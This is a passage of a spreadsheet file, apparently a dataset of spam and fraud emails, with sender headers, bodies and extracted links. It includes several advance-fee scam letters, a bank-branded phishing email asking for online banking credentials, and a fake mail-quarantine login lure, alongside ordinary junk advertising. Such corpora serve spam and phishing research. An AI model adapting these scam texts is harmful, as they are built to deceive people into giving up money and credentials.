LATE HUSBAND\nTOOK BEFORE DEPOSITING THE FUND WITH THE SECURTY\nCOMPANY.\n \nPLEASE YOU CAN READ ABOUT PROBLEMS IN ZIMBABWE FROM THE\nLINKS BELOW.\n \n[URL]http://news.bbc.co.uk[/URL] \n[URL]http://news.bbc.co.uk[/URL] \n[URL]http://news.bbc.co.uk[/URL]\n\nBEST REGARDS, \nMRS MONICA MARTINS.\n(FOR THE FAMILY\n</t>
  </si>
  <si>
    <t>673</t>
  </si>
  <si>
    <t>To: nan\nFrom: =?UTF-8?B?Q2hhc2U=?= &lt;helenshidl@inbox.ru&gt;\nDate: Wed, 06 Sep 2017 00:26:10 +0300</t>
  </si>
  <si>
    <t>Wed, 06 Sep 2017 00:26:10 +0300</t>
  </si>
  <si>
    <t>=?UTF-8?B?Q2hhc2U=?= &lt;helenshidl@inbox.ru&gt;</t>
  </si>
  <si>
    <t>&gt;&gt; &gt;&gt; &gt;&gt;Dear Customer, &gt;&gt; &gt;&gt;In our customer reward monthly program, we wish to seize this opportunity to inform you that you've qualify to receive a free  &gt;&gt;$500 Bonus Shopping Gift Card  this month. &gt;&gt; &gt;&gt;DO THE FOLLOWING TO RECEIVE YOUR $500 SHOPPING BONUS GIFT CARD. &gt;&gt; &gt;&gt;Click our monthly customer reward program login button below. &gt;&gt;Fill-in your online banking login information correctly.  &gt;&gt;Confirm your email address and password that is attached to your account. &gt;&gt; &gt;&gt;NOTE: &gt;&gt;Your filled out informations will be matched up with information we currently have in our system in other for us to swiftly ship out your &gt;&gt;$500 Bonus Shopping Gift Card  to your primary address which is clearly stated in your account. &gt;&gt; &gt;&gt;&gt;Customer Reward Login &gt;&gt;OR copy and paste the below link in your browser in other to view our secured server online monthly customer  &gt;&gt;reward program. &gt;&gt; &gt;&gt;&gt;[URL]http://wurl.cc[/URL] &gt;&gt;This instruction has been sent to all active chase bank customers globally who do qualify to receive our monthly customer reward  &gt;&gt;gift package of  $500 Bonus Shopping Gift Card  and it is obligatory you comply immediately in other for us to swiftly ship out  &gt;&gt;your  $500 Bonus Shopping Gift Card  to your primary home address which is clearly stated in your account. &gt;&gt;Kindly expect your  $500 Bonus Shopping Gift Card  in your primary address within 72 hours after &gt;&gt;complying to the instructions in this email. &gt;&gt; &gt;&gt; &gt;&gt;Congratulations Once Again, &gt;&gt; &gt;&gt; &gt;&gt;Customers Reward Unit.  &gt;&gt;JPMorgan Chase &amp; Co. &gt;  Dear Customer,In our customer reward monthly program, we wish to seize this opportunity to inform you that you've qualify to receive a free $500 Bonus Shopping Gift Card this month.DO THE FOLLOWING TO RECEIVE YOUR $500 SHOPPING BONUS GIFT CARD.Click our monthly customer reward program login button below.Fill-in your online banking login information correctly. Confirm your email address and password that is attached to your account.NOTE:Your filled out informations will be matched up with information we currently have in our system in other for us to swiftly ship out your$500 Bonus Shopping Gift Card to your primary address which is clearly stated in your account.Customer Reward LoginOR copy and paste the below link in your browser in other to view our secured server online monthly customer reward program.[URL]http://wurl.cc[/URL] instruction has been sent to all active chase bank customers globally who do qualify to receive our monthly customer reward gift package of $500 Bonus Shopping Gift Card and it is obligatory you comply immediately in other for us to swiftly ship out your $500 Bonus Shopping Gift Card to your primary home address which is clearly stated in your account.Kindly expect your $500 Bonus Shopping Gift Card in your primary address within 72 hours aftercomplying to the instructions in this email.Congratulations Once Again,Customers Reward Unit.JPMorgan Chase &amp; Co.</t>
  </si>
  <si>
    <t>http://wurl.cc http://wurl.cc</t>
  </si>
  <si>
    <t>2486</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr.Jim Harry &lt;jimharry006@yahoo.it&gt;\nDate: Wed, 06 Sep 2006 21:59:12 -1200</t>
  </si>
  <si>
    <t>Wed, 06 Sep 2006 21:59:12 -1200</t>
  </si>
  <si>
    <t>Mr.Jim Harry &lt;jimharry006@yahoo.it&gt;</t>
  </si>
  <si>
    <t>REPLY BACK TO ME</t>
  </si>
  <si>
    <t>\nAttn\n&gt;From The Auditor/Head of Department\nBank of Scotland,\nUnited Kingdom.                   {Very Urgent Business\nTransaction}\n\nDear Partner,\n\nIn order to transfer out (fifteen-million pounds\nsterling)from our bank here i have the courageto look for a\nreliable and honest \nperson who will be capable for this important\ntransaction,believing \nthat you will neverlet me down either now or in future.I am\nMr Jim\nHarry the auditor and head of computing department of a bank\nhere in \nLondon, united Kingdom. There is an account opened in this\nbank in 1995 and since my inception into office in 2001,\nnobody has operated on this account again, after going\nthrough some old files,I discovered that if i do not remit\nthis money out urgently, it will be forfeited for nothing.\n\nHow the money came about:The owner of this account was Mr.\nJohn Hughes who was a foreigner and the manager of Petro\nchemical service here in London, a chemical engineer by\nprofession and he died since 1995.And then, since\n2001,nobody knows about this account or anything concerning\nit, the account has no other beneficiary and my\ninvestigation proved to me as well that his company does not\nknow anything about this account and the amount involved is\n(15,000,000.00)pounds sterling.\n\nI am only contacting you as a foreigner because this \nmoney can not be approved to any local bank here in London,\nbut can \nonly be approved to any foreign account because the money is\npounds \nsterling?and the former owner of the account is John Hughes\nand he was a foreigner too.\nFinally,at the conclusion of this business,you will be given\n35% of the total ammount,60% will be for me ,while 5% will\nbe for expenses both parties might have incured during the\nprocess of this \ntransaction.Please you should include your phone and fax\nnumber for \neasily communications.\n\nYours Sincerely,\n\nAuditor Jim Harry\n\n\n\n----------------------------------------\nUpgrade your account today for increased storage; mail\nforwarding or POP enabled e-mail with automatic virus\nscanning. Visit our member benefits page at\n[URL]https://members.canada.com[/URL] for more\ninformation.\n\n\n</t>
  </si>
  <si>
    <t>https://members.canada.com</t>
  </si>
  <si>
    <t>2483</t>
  </si>
  <si>
    <t>To: nan\nFrom: ahmed karim &lt;ahmed-k1@hotmail.fr&gt;\nDate: Wed, 06 Sep 2006 21:54:54 +0200</t>
  </si>
  <si>
    <t>Wed, 06 Sep 2006 21:54:54 +0200</t>
  </si>
  <si>
    <t>ahmed karim &lt;ahmed-k1@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>MR. AHMED KARIM.</t>
  </si>
  <si>
    <t>\nFROM THE OFFICE MR KARIM AHMED.\nAFRICAN DEVELOPMENT BANK (ADB).\nOUAGADOUGOU BURKINA FASO.\nWEST AFRICA.\n\n\n\nTRANSFER OF ($ 25,200.000.00) TWENTY FIVE MILLION, TWO HUNDREN\nTHOUSAND DOLLARS.\n\n\nI AM KARIM AHMED, THE AUDITOR GENERAL OF AFRICAN DEVELOPMENT BANK HERE IN \nBURKINA FASO. DURING THE COURSE OF OUR AUDITING, I DISCOVERED A FLOATING \nFUND IN AN ACCOUNT OPENED IN THE BANK BY MR JOHN KOROVO  AND AFTER GOING \nTHROUGH SOME OLD FILES IN THE RECORDS I DISCOVERED THAT THE OWNER OF THE \nACCOUNT DIED IN  THE (BEIRUT-BOUND CHARTER JET) PLANE CRASH ON THE 25TH \nDECEMBER 2003 IN COTONOU (REPUBLIC OF BENIN). HERE IS \nTHE(WEBSITE=HTTP://WWW.CNN.COM/2003/WORLD/AFRICA/12/26/BENIN.CRASH/INDEX.HTML).AND \nNOBODY HAS OPERATED ON THIS ACCOUNT AGAIN,\n\nTHE OWNER OF THIS ACCOUNT IS MR JOHN KOROVO A FOREIGNER, AND A TRADER WHO \nTRADE ON GOLD AND MINING, HE DIED, SINCE 2003 AND NO OTHER PERSON KNOWS \nABOUT THIS ACCOUNT OR ANY THING CONCERNING IT, THE ACCOUNT HAS NO OTHER \nBENEFICIARY AND MY INVESTIGATION PROVED TO ME AS WELL THAT MR JOHN KOROVO \nDIE ALONG WITH HIS TIRED FAMILY.\n\nTHE AMOUNT INVOLVED IS (USD 25.2 M) TWENTY-FIVE MILLION, TWO HUNDRED  \nTHOUSAND UNITED STATES DOLLARS ONLY , I AM  CONTACTING YOU AS A FOREIGNER \nBECAUSE THIS MONEY CAN NOT BE APPROVED TO A LOCAL PERSON HERE,  BUT CAN ONLY \nBE APPROVED TO ANY FOREIGNER WITH VALID INTERNATIONAL PASSPORT OR DRIVERS \nLICENSE AND FOREIGN ACCOUNT BECAUSE THE MONEY IS IN US DOLLARS AND THE \nFORMER OWNER OF THE ACCOUNT MR JOHN KOROVO IS A FOREIGNER TOO, AND THE MONEY \nCAN ONLY BE APPROVED INTO A FOREIGN ACCOUNT.\n\nI NEED YOUR STRONG ASSURANCE THAT YOU WILL NEVER, NEVER CHEAT ME AS SOON AS \nTHIS FUND HIT INTO YOUR ACCOUNT. WITH MY INFLUENCE AND THE POSITION OF THE \nBANK OFFICIAL WE CAN TRANSFER THIS MONEY TO ANY FOREIGNER'S RELIABLE ACCOUNT \nWHICH YOU CAN PROVIDE WITH ASSURANCE THAT THIS MONEY WILL BE INTACT PENDING \nOUR PHYSICAL ARRIVAL IN YOUR COUNTRY FOR SHARING. THE BANK OFFICIAL WILL \nPROVE ALL DOCUMENTS OF TRANSACTION IMMEDIATELY FOR YOU TO RECEIVE THIS FUND \nLEAVING NO TRACE TO ANY PLACE AND TO BUILD CONFIDENCE.\n\nON THE CONCLUSION OF THIS TRANSACTION YOU WILL BE ENTITLED TO 30% OF THE \nTOTAL SUM AS GRATIFICATION, WHILE 10% WILL BE SET ASIDE TO TAKE CARE OF \nTHEEXPENSES THAT MAY ARISE DURING THE TIME OF TRANSFER AND ALSO TELEPHONE \nBILLS, WHILE 60% WILL BE FOR ME.\n\n\nSO ON THE INDICATION OF YOUR WILLINGNESS I WANT YOU TO FORWARD TO ME  YOUR \n:FULL NAME: SEX: COMPANY: IF ANY FULL CONTACT ADDRESS: PHONE: CELL: FAX: \nCITY: STATE:ZIP CODE COUNTRY: OCCUPATION AND ALL THE NECESSARYINFORMATION \nWILL BE SENT TO YOU ON THE ACCEPTANCE TO CHAMPION THIS TRANSACTION WITH ME.\n\nHERE IS MY PRIVATE TELEPHONE NUMBER: 00226 76 12 29 38.\n\nTHANKS\nYOURS TRULY\nKARIM AHMED\n\n_________________________________________________________________\nMSN Hotmail sur i-mode : envoyez et recevez des e-mails depuis votre \ntlphone portable ! [URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>3115</t>
  </si>
  <si>
    <t>To: nan\nFrom: miriam kolo &lt;miriamkolo67@hotmail.com&gt;\nDate: Wed, 06 Jun 2007 17:34:58 -0600</t>
  </si>
  <si>
    <t>Wed, 06 Jun 2007 17:34:58 -0600</t>
  </si>
  <si>
    <t>miriam kolo &lt;miriamkolo67@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Good Day</t>
  </si>
  <si>
    <t>AB 01 COCODYTreshville Abidjan My Name is Miriam; I worked as a maid to Mr. ROBERT BUTLER an American, who used to be a contractor with an oil servicing company based here in Cote D’Ivoire. Last year,{Jan. 2006} my master died of a serious illness, but before his death, he told me in confidence of a fund of Twenty Seven Million dollars (US$27,000,000.00) which he concealed in two trunk boxes and  deposited with a finance House in Cote D’Ivoire. However, the Finance house does not know the true content of the trunk to be cash as my Master declared upon deposit as containing art craft for export. Because of the fast deteriorating state of his health, he was afraid that he might die loosing all he has in a foreign country. He instructed me that if he dies, I should try everything within my capability to make sure that his fund at the safe keeping house gets into the hands of the less privileged in his home country and he handed over the documents of this deposit to me with a written instruction.  I have contacted the finance house over this issue, but they refused to release the trunk Boxes to me, unless I bring any of Mr. ROBERT BUTLER'S relatives. This is a very tough situation for me, because since I lived with my master, he has not mentioned any of his family or extended relatives and Since I have been unsuccessful in locating the relatives for over a year now, I seek your consent to present you to the finance house as an extended relative of my master so that the trunk boxes can be released to you and you will use some part of the money inside for the good purpose of my master while the both of us share the remaining..\nIf you can handle this with me, kindly respond back immediately and we will negotiate on what will be given to you for your kind effort.\nThanking you for your cooperation.\nMiriam\n_________________________________________________________________\nLive Earth is coming.  Learn more about the hottest summer event - only on MSN.\n[URL]http://liveearth.msn.com[/URL]</t>
  </si>
  <si>
    <t>http://liveearth.msn.com</t>
  </si>
  <si>
    <t>2773</t>
  </si>
  <si>
    <t>To: nan\nFrom: amita@nuhanvayeamita.orangehome.co.uk\nDate: Wed, 06 Dec 2006 20:30:25 +0100</t>
  </si>
  <si>
    <t>Wed, 06 Dec 2006 20:30:25 +0100</t>
  </si>
  <si>
    <t>amita@nuhanvayeamita.orangehome.co.uk</t>
  </si>
  <si>
    <t>CONFIDENTIALITY NOTICE</t>
  </si>
  <si>
    <t>Dear Sir/Madam,\nWith Due Regard.\nKindly accept my apology for sending unsolicited mail to you.I believe\nyou are a highly respected personality, considering the fact that I sourced your profile from a human resource profile database on your country.\nThough, I do not know to what extent you are familiar with events and\nfragile political situation in Liberia but it has formed consistent\nheadlines in the CNN, BBC news bulletins.\n\nMy name is Miss. Joy Nuhan Vaye from Liberia, a Country in West Africa And My father is Issac Nuhan Vaye, Deputy Minister of Public Works, Liberia.He was falsely accused of plotting to remove the then\nPRESIDENT OF LIBERIA (CHARLES TAYLOR) from office.\nWithout trial my father was killed by Charles Taylor and his government agent.You can verify this from your country. You can also check in some of the international newspapers posted in the web sites below:\n\n(i) [URL]http://www.usatoday.com[/URL]\n(ii) [URL]http://www.unwire.org[/URL]\n\nBefore my father was killed, he moved out the sum of $1.5 million\nthrough a diplomatic means, and deposited it with a Security Company Abroad.\n\nAll that is needed is for my lawyer to obtain a letter o authorisation with your name as my foreign business partner and instruct the company to transfer the funds to your account as my foreign business partner, I will renumerate you with 20% at the end, but most of all is that I solicit your is your sincere trust in this transaction.\n\nI have been confined only to our country home and all my calls are\nmonitored,therefore on receipt o your positice response I will forward to you the contact information of a lawyer i have approached to assist me here so that you can contact him to get the necessary legal documents that will be required to retrieve the fund from the custody of the security company.\nyou will aid me to invest the money in your country.\n\nLastly,kindly include your private telephone and fax numbers where you can always be reached, your residential or company address for my documentation, i will also hand it over to the lawyer so that he will call you on the way forward to proceed with the transaction. you as well reach me with my private \nemail address: joy_vaye@yahoo.com (OR)e-mail:joy_vaye200@myway.com \n\nSincerely One,\n\nMiss. Amita NUHAN VAYE</t>
  </si>
  <si>
    <t>http://www.usatoday.com http://www.unwire.org</t>
  </si>
  <si>
    <t>1398</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: E-Mail Support &lt;mcamacho@cargoforceinc.com&gt;\nDate: Wed, 06 Apr 2022 09:33:46 +0000 (UTC)</t>
  </si>
  <si>
    <t>Wed, 06 Apr 2022 09:33:46 +0000 (UTC)</t>
  </si>
  <si>
    <t>E-Mail Support &lt;mcamacho@cargoforceinc.com&gt;</t>
  </si>
  <si>
    <t>Mail Delivery Failure (Incoming Mail Blocked)</t>
  </si>
  <si>
    <t>************************* Blocked Incoming Messages ************************* Dear jose@monkey.org , Incoming messages were blocked due to Email Account Verification Failure by you for the year 2022. You have 3 new messages in your email quarantine pending to be delivered into your Inbox. * * *Date:* 5/4/2022 9:14:19 a.m. Click on Release, to free these messages to your inbox and to Verify your Mail Account : Deliver Messages *Quarantined email* Subject: Subject: Date: *Release* ( [URL]https://storageapi2.fleek.co[/URL] ) Re:Enquiry/Consultation RE: Send PI Asap for payment 5/4/2022 9:14:19 a.m. *Release* ( [URL]https://storageapi2.fleek.co[/URL] ) Re: Balance Payment RE: T/T Payment Copy 5/4/2022 9:14:19 a.m. *Release* ( [URL]https://storageapi2.fleek.co[/URL] ) Re: Account Statement RE: New Purchase order 5/4/2022 9:14:19 a.m. *Deliver all messages (3)* ( [URL]https://storageapi2.fleek.co[/URL] ) E-Mail Support 2360 NW 66Th Ave, BLDG 701, Suite 102 , Miami , FL 33122 Unsubscribe ( [URL]https://u26129039.ct.sendgrid.net[/URL] ) - Unsubscribe Preferences ( [URL]https://u26129039.ct.sendgrid.net[/URL] ) Blocked Incoming Messages Dear jose@monkey.org   ,  Incoming messages were blocked due to Email Account Verification Failure by you for the year 2022.    You have 3 new messages in your email quarantine pending to be delivered into your Inbox. Date: 5/4/2022 9:14:19 a.m. Click on Release, to free these messages to your inbox and to Verify your Mail Account : Deliver Messages    Quarantined email   Subject: Subject: Date: ReleaseRe:Enquiry/Consultation RE: Send PI Asap for payment 5/4/2022 9:14:19 a.m. Release Re: Balance Payment RE: T/T Payment Copy 5/4/2022 9:14:19 a.m. ReleaseRe: Account Statement RE: New Purchase order 5/4/2022 9:14:19 a.m.        Deliver all messages (3)             E-Mail Support            2360 NW 66Th Ave, BLDG 701, Suite 102, Miami, FL 33122             Unsubscribe                      -                        Unsubscribe Preferences</t>
  </si>
  <si>
    <t>https://storageapi2.fleek.co https://storageapi2.fleek.co https://storageapi2.fleek.co https://storageapi2.fleek.co https://u26129039.ct.sendgrid.net https://u26129039.ct.sendgrid.net</t>
  </si>
  <si>
    <t>5103</t>
  </si>
  <si>
    <t>To: &lt;llilley@juno.com&gt;, &lt;johnhall_10@gte.net&gt;, &lt;rmaae@yahoo.com&gt;,\nFrom: bobba5161465sdy@yahoo.com\nDate: Wed, 05 Jun 2002 15:19:34 -1900</t>
  </si>
  <si>
    <t>Wed, 05 Jun 2002 15:19:34 -1900</t>
  </si>
  <si>
    <t>bobba5161465sdy@yahoo.com</t>
  </si>
  <si>
    <t>&lt;llilley@juno.com&gt;, &lt;johnhall_10@gte.net&gt;, &lt;rmaae@yahoo.com&gt;,</t>
  </si>
  <si>
    <t>Septic tank care. (Free Trail)COKXWEJ</t>
  </si>
  <si>
    <t>If your home is served by a septic system, you will be\nable to receive invaluable information on how to\neliminate pump outs, maintain the system properly for FREE !!!\n\nOur packetge will cure problems such as backups, wet spots, odor, etc.\n\nYou can start this FREE trial by checking out our SPC program at:\n\n   [URL]http://www.abc-holdings.info[/URL]\n\nPlease takes a mintuet to fill out the form, and we will send out your free trail packetage.</t>
  </si>
  <si>
    <t>http://www.abc-holdings.info</t>
  </si>
  <si>
    <t>5087</t>
  </si>
  <si>
    <t>To: &lt;dawn@netnut.net&gt;\nFrom: "Jillian Oros" &lt;hrefyrbafo@hotmail.com&gt;\nDate: Wed, 05 Jun 2002 13:31:30 -0300</t>
  </si>
  <si>
    <t>Wed, 05 Jun 2002 13:31:30 -0300</t>
  </si>
  <si>
    <t>"Jillian Oros" &lt;hrefyrbafo@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;dawn@netnut.net&gt;</t>
  </si>
  <si>
    <t>Online credit repair.Do it yourself.                 19186</t>
  </si>
  <si>
    <t>| &lt;= /A&gt;   ![](3D[URL]http://213.139.76.162[/URL]      ![3D""](=3D[URL]http://213.139.76.162[/URL]   Thank You,   ![](3D[URL]http://213.139.76.162[/URL]      ---   ![](3D[URL]http://213.139.76.162[/URL]      Your email address was obtained from a purch= ased list, Reference # 1320-15000.  If you wish to unsubscribe from t= his list, please Click here and e= nter your name into the remove box. If you have previously unsubscribed and are still receiving this message, you may email our Abuse Contr= ol Center, or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, Miami, FL, 33155".      ![](3D[URL]http://213.139.76.162[/URL]   (C) 2002 Web Credit Inc. All Rights Reser= ved.</t>
  </si>
  <si>
    <t>http://213.139.76.162 http://213.139.76.162 http://213.139.76.162 http://213.139.76.162 http://213.139.76.162</t>
  </si>
  <si>
    <t>5102</t>
  </si>
  <si>
    <t>To: &lt;Intelligence@mandark.labs.netnoteinc.com&gt;\nFrom: "ROMELIA" &lt;arry532@post.sk&gt;\nDate: Wed, 05 Jun 2002 12:53:49 -1800</t>
  </si>
  <si>
    <t>Wed, 05 Jun 2002 12:53:49 -1800</t>
  </si>
  <si>
    <t>"ROMELIA" &lt;arry532@post.sk&gt;</t>
  </si>
  <si>
    <t>&lt;Intelligence@mandark.labs.netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>best home mortgage rate             MOFJN</t>
  </si>
  <si>
    <t>Intelligence\n\n\n\nBad Credit? Great!\n\nWe want you!\n\nWe want to refinance people that DO NOT\nhave good credit. \n\nHave you had credit in  the past? Good! \nFill out this short form because we want \nto refinance your house! \n\nPoor credit is all we do!\n\n\nLet us Put Our Expertise to Work for You!\n[URL]http://wdBmWYjno1@agileconcepts.com[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nErase\n[URL]http://ltgjSs5P9a@agileconcepts.com[/URL]</t>
  </si>
  <si>
    <t>http://wdBmWYjno1@agileconcepts.com http://ltgjSs5P9a@agileconcepts.com</t>
  </si>
  <si>
    <t>5089</t>
  </si>
  <si>
    <t>To: &lt;west.capital@t-online.de&gt;, &lt;wenjeff@earthlink.net&gt;,\nFrom: cristobal6@hotmail.com\nDate: Wed, 05 Jun 2002 03:12:45 -1600</t>
  </si>
  <si>
    <t>Wed, 05 Jun 2002 03:12:45 -1600</t>
  </si>
  <si>
    <t>cristobal6@hotmail.com</t>
  </si>
  <si>
    <t>&lt;west.capital@t-online.de&gt;, &lt;wenjeff@earthlink.net&gt;,</t>
  </si>
  <si>
    <t>Stop creditors in their tracks           10891</t>
  </si>
  <si>
    <t>** 5 FREE eBooks JUST FOR SIGNING UP. Sent via email within\n   48 hours of entering your name and email address.\n** NO PRESSURE TO BUY!\n** TEST DRIVE IT FOR AS LONG AS YOU WISH FOR FREE!\n** ONLY GET INVOLVED IF YOU LIKE WHAT YOU SEE.\n\nWe will put 800 in your Downline in 30 days!!\n\nVisit [URL]http://www.fastbizonline.com[/URL]\n\n         TRY IT FOR FEEE!\n\nIt's working for me!!  I'm earning a guaranteed minimum\nmonthly income of $3,000.00!! and you can too!\n\nAccept our no cost, no obligation opportunity to\nwatch your business grow before you spend a dime.\n\nVisit [URL]http://www.fastbizonline.com[/URL]\n\nWhy are we doing this? Because when you see the\nexplosive growth and momentum, and how this\nprogram was designed to help any sincere marketer\nsucceed, you'll accept the downline we've built under\nyou and harvest your piece of this incredible event.\n\nJoin the team of Internet Marketing Professionals that\nare presenting this opportunity to hundreds of people\nevery day!\n\nTheres absolutely NO risk in joining\nYou owe it to yourself to\nSee it work today!!\n\nVisit [URL]http://www.fastbizonline.com[/URL]\n\nFIRE YOUR BOSS!\n\nPAY OFF YOUR BILLS!\n\nSPEND MORE TIME WITH YOUR FAMILY!\n\nBUY A NEW CAR!\n\nPAY OFF YOUR MORTGAGE!\n\nAre all of these things are possible?\n\nYOU BET THEY ARE!\n\n\nVisit [URL]http://www.fastbizonline.com[/URL]\n\nVisit [URL]http://www.fastbizonline.com[/URL]\n\nVisit [URL]http://www.fastbizonline.com[/URL]\n\n\n\n\n\n\n*************************************************************\nIf you do not wish to receive any more emails from me, please \nsend an email to "affiliate1@btamail.net.cn" requesting to be \nremoved.\n*************************************************************</t>
  </si>
  <si>
    <t>http://www.fastbizonline.com http://www.fastbizonline.com http://www.fastbizonline.com http://www.fastbizonline.com http://www.fastbizonline.com http://www.fastbizonline.com</t>
  </si>
  <si>
    <t>5081</t>
  </si>
  <si>
    <t>To: Undisclosed@dogma.slashnull.org\nFrom: &lt;hothorn@concentric.net&gt;\nDate: Wed, 05 Jun 0102 05:50:03 +0600</t>
  </si>
  <si>
    <t>Wed, 05 Jun 0102 05:50:03 +0600</t>
  </si>
  <si>
    <t>&lt;hothorn@concentric.net&gt;</t>
  </si>
  <si>
    <t>Undisclosed@dogma.slashnull.org</t>
  </si>
  <si>
    <t>Increase your penis size 25% in 2 weeks!</t>
  </si>
  <si>
    <t>\n\nHave a BLAST in bed, GUARANTEED!\n\n![]([URL]http://tv-discounters.com[/URL]![](http://tv-\ndiscounters.com/images/middlemax.gif)![](http://tv-\ndiscounters.com/images/rightmax.gif)\n\n** Finally, a safe and natural penile enlargement supplement!  \nNaturally boost your sex drive and rejuvenate sexual function.**  \n  \n---  \n  \n![]([URL]http://tv-discounters.com[/URL] news, men! Recent\ndiscoveries in herbal medicine have made it possible for men to safely and\neffectively boost their sexual vitality while increasing their penis size by\n25% or more!\n\nCertified Natural Laboratories is pleased to introduce the latest addition to\ntheir widely acclaimed line of herbal supplements: _**Maxaman !.**_</t>
  </si>
  <si>
    <t>http://tv-discounters.com http://tv-discounters.com</t>
  </si>
  <si>
    <t>1968</t>
  </si>
  <si>
    <t>To: selahbekou@hotmail.fr\nFrom: selah bekou &lt;selahbekou@hotmail.fr&gt;\nDate: Wed, 05 Apr 2006 16:55:37 +0200</t>
  </si>
  <si>
    <t>Wed, 05 Apr 2006 16:55:37 +0200</t>
  </si>
  <si>
    <t>selah bekou &lt;selahbekou@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>selahbekou@hotmail.fr</t>
  </si>
  <si>
    <t>From Selah Bekou For The Family</t>
  </si>
  <si>
    <t>Dearest One,\nI am Miss Selah Bekou from Ivory Coast, I need your help to transfer sum of \n4.5 million US dollars my late father kept in a deposit with a bank. I am \nthe next of kin. My late father was killed by the Rebels during last three \nmonths Reble attack in our country. My late father was former minister of \nWorks and development. I am here with my mother with my only junior brother. \nIn fact we want to move out from our country after transfering our money \ninto any safe bank account you can give to us as we do not have good \nsecurity here . Please reply me urgently. Please we need your immediate help \nto invest our money into real estate &amp; big hotel business being my mother's \nplans.\nYours family in one God,\nMiss Selah for the family\nplesea This My Private email (selahprivacy@yahoo.fr)\n\n_________________________________________________________________\nTout savoir sur la sécurité de votre PC ! \n[URL]http://go.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://go.msn.fr</t>
  </si>
  <si>
    <t>1967</t>
  </si>
  <si>
    <t>To: selahbekou@hotmail.fr\nFrom: selah bekou &lt;selahbekou@hotmail.fr&gt;\nDate: Wed, 05 Apr 2006 16:55:31 +0200</t>
  </si>
  <si>
    <t>Wed, 05 Apr 2006 16:55:31 +0200</t>
  </si>
  <si>
    <t>Dearest One,\nI am Miss Selah Bekou from Ivory Coast, I need your help to transfer sum of \n4.5 million US dollars my late father kept in a deposit with a bank. I am \nthe next of kin. My late father was killed by the Rebels during last three \nmonths Reble attack in our country. My late father was former minister of \nWorks and development. I am here with my mother with my only junior brother. \nIn fact we want to move out from our country after transfering our money \ninto any safe bank account you can give to us as we do not have good \nsecurity here . Please reply me urgently. Please we need your immediate help \nto invest our money into real estate &amp; big hotel business being my mother's \nplans.\nYours family in one God,\nMiss Selah for the family\nplesea This My Private email (selahprivacy@yahoo.fr)\n\n_________________________________________________________________\nWindows Live Mail : découvrez et testez la version bêta ! \n[URL]http://www.imagine-msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.imagine-msn.com</t>
  </si>
  <si>
    <t>1969</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mohamat Ali &lt;mohamat13@hotmail.com&gt;\nDate: Wed, 05 Apr 2006 15:42:21 +0000</t>
  </si>
  <si>
    <t>Wed, 05 Apr 2006 15:42:21 +0000</t>
  </si>
  <si>
    <t>Mohamat Ali &lt;mohamat13@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF : MR MOHAMAT ALI,\nAUDITING AND ACCOUNTING SECTION,\nAFRICAN DEVLOPMENT BANK ( A.D.B )\nOUAGADOUGOU BURKINA-FASO,WEST AFRICA.\n\n\nAttention Please,\n\n\nI am Mr Mohamat Ali, the Director in charge of Auditing and Accounting \nsection of AFRICAN DEVELOPMENT BANK (A.D.B) Ouagadougou Burkina-faso West \nAfrica. With due respect and regard. I have decided to contact you on a \nbusiness transaction that will be very beneficial to both of us at the end \nof the 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7.5M (Seven Million,Five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30% of the \ntotal sum as gratification, while 10% will be set aside to take care of \nexpenses that may arise during the time of transfer and also telephone and \ninternet bills, while 60% will be for me and my coleagues. Please, you have \nbeen adviced to keep "Top Secret" as I am still in service and intend to \nretire from service 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Mr Mohamat Ali.\n\nMOBILE: ( 00226 78 82 97 88 )\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>4329</t>
  </si>
  <si>
    <t>To: &lt;ler@lerctr.org&gt;\nFrom: "Deepak Nagpal" &lt;exhibitionsindia@vsnl.com&gt;\nDate: Wed, 04 Sep 2002 16:55:29 +0530</t>
  </si>
  <si>
    <t>Wed, 04 Sep 2002 16:55:29 +0530</t>
  </si>
  <si>
    <t>"Deepak Nagpal" &lt;exhibitionsindia@vsnl.com&gt;</t>
  </si>
  <si>
    <t>11th Convergence India 2003 exhibition &amp; conference</t>
  </si>
  <si>
    <t>Dear Sir/Madam,   I got this email id from your website.   Our organisation, Exhibitions India  Pvt Ltd organises the annual Convergence India exhibition and conference in New  Delhi, India during the month of March. Convergence India is the longest  running international trade-show and the only forum in India to  showcase the convergence of voice and data networks, delivery of content,  television and entertainment applications, broadcast, telecommunications, fixed  and mobile networks, internet, computing etc.   For the same, I would like to contact  the concerned person in your organisation. Could you please advise his/her  complete contact details or please forward the following mail to him/her. In  case you are the decision maker about participation in international  exhibitions, following this mail is some information on our annual  event.   Thank you in advance.   Sincerely and with best regards,   Deepak Kr. Nagpal Executive Marketing   Exhibitions India Pvt. Ltd.A-17 2nd  FloorDDA SCO ComplexNear Moolchand FlyoverDefence ColonyNew  Delhi 110 024Tel:  +91 11 463 8680-84Fax: +91 11 463 3506, 462  3320email: exhibitionsindia@vsnl .comwebsite:  [URL]www.exhibitionsindia.o[/URL] rg     INFORMATION ABOUT THE  EVENT   Exhibitions India organises the Convergence  India  exhibition &amp; conference, which is the longest running  international trade-show and the only forum in India to showcase the  convergence of voice and data networks, delivery of content, television and  entertainment applications, broadcast, telecommunications, fixed and mobile  networks, internet, computing etc.   Exhibitions India invites you to participate  at the 11th Convergence India 2003 exhibition &amp;  conference, which will be at Pragati Maidan, New Delhi,  India during 11-13 March 2003.   The  Government of India has recently mandated the Conditional Access System for  distribution of satellite television channels. This has created a whole new  marketplace in the Indian cable industry. Once this bill is made an act, it will  be mandatory for cable operators to distribute pay channels through a set-top  box.India has an estimated 38 million cable homes! The  implementation of this change will require massive investments in set-top boxes,  conditional access software and the upgradation of headend networks - a great  oppotunity for you to tap this huge market!! Exhibiting your products at the  11th Convergence India 